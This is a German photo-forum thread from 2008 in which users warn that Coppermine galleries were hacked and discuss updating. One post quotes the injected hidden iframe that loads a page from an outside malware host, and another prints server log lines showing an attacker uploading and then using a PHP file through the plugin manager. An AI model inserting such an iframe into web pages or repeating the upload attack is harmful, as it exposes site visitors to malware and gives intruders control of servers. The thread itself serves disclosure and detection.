 |
|
 |
|||||||
Forum für die Fotosysteme von Sony und KonicaMinolta |
|
|
|
|
|
|
|||||||||||||
|
||||||||||||||||
|
||||||||||||||||
|
|
14.04.2008, 08:14
|
#1 |
|
Registriert seit: 03.11.2006
Ort: Berlin
Beiträge: 11.088
|
Coppermine-Gallery gehackt? Schaut lieber mal nach...
Hiho,
heute morgen hatte ich eine etwas unerfreuliche mail von Kerstin in meinem Postfach, Antivir fand mit der Heuristik (mein NOD blieb still  ) ein Problem in meiner Coppermine-Galerie => html/infected.webpage.gen.Wie sich herausgestellt hat, wurde in drei PHP-Seiten (und das beunruhigt mich dann doch  ) ein Iframe an den Anfang gesetzt.Code:
<iframe style="display: none" src="http://caatadgouk.com/dl/adv436.php" width="1" height="1"></iframe> Siehe dazu auch den Thread im Coppermine-Forum. http://forum.coppermine-gallery.net/...c,51671.0.html Also, Leute die Coppermine haben sollten mal schauen... Edit: ne neue Version von Coppermine soll das Problem beseitigen. Hilft aber nicht, wenn es schon passiert ist  Trotzdem, man sollte unbedingt updaten, vor allem wenn man bisher verschont wurde! http://forum.coppermine-gallery.net/...c,51787.0.html Viele Grüße Andreas
__________________
abgedunkelt.de Geändert von baerlichkeit (14.04.2008 um 08:54 Uhr) |
|
|
| Sponsored Links | |
|
|
|
|
14.04.2008, 09:33
|
#2 |
|
Registriert seit: 08.09.2004
Ort: A-Nebelberg
Beiträge: 1.649
|
Hallo Andreas,
vielen Dank für die Info - dann werde ich mal updaten. Wie merke ich, dass die Galerie bereits befallen ist? Beim Besuch bekomme ich von meinem Antivirusprogramm keine Fehlermeldungen. Ich lade mal sämtliche PHP-Files vom Server runter und vergleiche sie mit den Original-Installationsdateien. Dann müsste ich merken, ob was geändert wurde. Lg. Josef |
|
|
|
|
14.04.2008, 09:39
|
#3 |
|
Themenersteller
Registriert seit: 03.11.2006
Ort: Berlin
Beiträge: 11.088
|
Hallo Josef,
im Quellcode der generierten Seite schauen, ob da irgendwo ein ominöses Iframe auftaucht. Bei mir (und den anderen wohl auch) ist folgendes passiert: Heute Nacht ein Angriff, bei dem über eine Lücke im Upload-Teil der CPG eine Datei ins Plugin-Verzeichnis geladen wurde. (es gab auch Fälle in denen php-Dateien als zip/jpg ins Album Verzeichnis gepackt wurden) Code:
91.78.72.131 - - [13/Apr/2008:16:19:45 +0200] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 24245 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:19:46 +0200] "GET /pluginmgr.php HTTP/1.1" 200 24217 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:19:47 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:19:56 +0200] "GET /plugins/zacosmall.php HTTP/1.1" 200 5047 "-" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:19:57 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:19:59 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 26145 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:20:00 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:20:07 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 19002 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:20:07 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)" 91.78.72.131 - - [13/Apr/2008:16:20:12 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 2037 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)" Logs durchstöbern und nach der upload-Funktion suchen hat bei mir den Zugriff gezeigt.
__________________
abgedunkelt.de |
|
|
|
|
14.04.2008, 10:12
|
#4 |
|
Registriert seit: 24.08.2005
Ort: Im schönen NRW
Beiträge: 1.953
|
Da bei mir auch Coppermine läuft, welche Version hast du?
|
|
|
|
|
14.04.2008, 10:14
|
#5 |
|
Themenersteller
Registriert seit: 03.11.2006
Ort: Berlin
Beiträge: 11.088
|
Ich hatte die 1.4.16, also die bis dato neuste.
Eben auf die 1.4.17 upgedatet... läuft wieder, bis jetzt noch nicht neu gehackt, mal abwarten 
__________________
abgedunkelt.de |
|
|
|
| Sponsored Links | |
|
|
|
|
14.04.2008, 10:23
|
#6 |
|
Registriert seit: 24.08.2005
Ort: Im schönen NRW
Beiträge: 1.953
|
ätz, werd ich wohl auch machen müssen.... da werd ich mir beim bridgen ja wieder die finger brechen
|
|
|
|
|
19.04.2008, 21:00
|
#7 |
|
Registriert seit: 24.08.2005
Ort: Im schönen NRW
Beiträge: 1.953
|
Coppermine 1.4.18 (sql injection fixed)
Nachdem vor einer Woche Bärlichkeit mit dem Hinweis auf die cpg 1.4.17 kam (alte 1.4.16 hackbar über die upload routine)
Nun von mir der Hinweis auf die 1.4.18, wo eine weitere Möglichkeit einer sql injection gefixed wurde. Hinwiese zum einem Update und Downloadmöglichkeit Hier Da ja einige hier eine CPG betreiben vielleicht mal anschauen. (Update ist übrigens problemlos, selbst die gebridgde Coppermine 1.4.18 in Joomla auf meiner HP läuft sauber) Black Geändert von Blackmike (19.04.2008 um 21:05 Uhr) |
|
|
|
|
19.04.2008, 22:23
|
#9 |
|
Registriert seit: 10.06.2004
Beiträge: 5.296
|
Siehe den Thread -> CPG hacked ab Posting #9.
Dort ging es schon um CPG 1.4.18. So könnte man doch eigentlich der Übersichtlichkeit wegen, diesen Thread einfach drüben unten ankleben See ya, Maic.
__________________
Sensorart | 1001 Cars - Cars, Bikes & Rockabilly | Mein Profil in der FC | FreiesFotoForum |
|
|
|
|
19.04.2008, 23:37
|
#10 |
|
Registriert seit: 24.08.2005
Ort: Im schönen NRW
Beiträge: 1.953
|
Upps, sorry, stimmt.. ich hatte nur den Ursprungsthreat im Kopf gehabt.... und war halt eine Woche beruflich ohne Netz
Black |
|
|
|
| Sponsored Links | |
|
|
|
|
|
|
Hybrid-Darstellung
